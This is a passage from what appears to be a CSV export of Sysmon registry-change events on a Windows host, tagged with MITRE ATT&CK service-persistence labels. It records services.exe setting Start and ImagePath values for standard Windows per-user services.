service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.640301300Z"",""eventRecordID"":""602"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.636",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.639008900Z"",""eventRecordID"":""601"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.630",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.638344600Z"",""eventRecordID"":""600"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3f376\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3f376\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3f376\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 12:33:19.609",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.635372900Z"",""eventRecordID"":""599"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.575",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.634860900Z"",""eventRecordID"":""598"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.556",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.632538600Z"",""eventRecordID"":""597"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 12:33:19.544",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.632238400Z"",""eventRecordID"":""596"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.529",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.631014400Z"",""eventRecordID"":""595"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 12:33:19.495",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.630544700Z"",""eventRecordID"":""594"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.480",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.629298800Z"",""eventRecordID"":""593"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 24, 2020 @ 12:33:19.468",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.628979200Z"",""eventRecordID"":""592"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.454",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.627580800Z"",""eventRecordID"":""591"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f376\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 24, 2020 @ 12:33:19.431",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.626741700Z"",""eventRecordID"":""590"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.402",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.625283900Z"",""eventRecordID"":""589"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 12:33:19.363",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.624949500Z"",""eventRecordID"":""588"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.324",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.622707100Z"",""eventRecordID"":""587"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 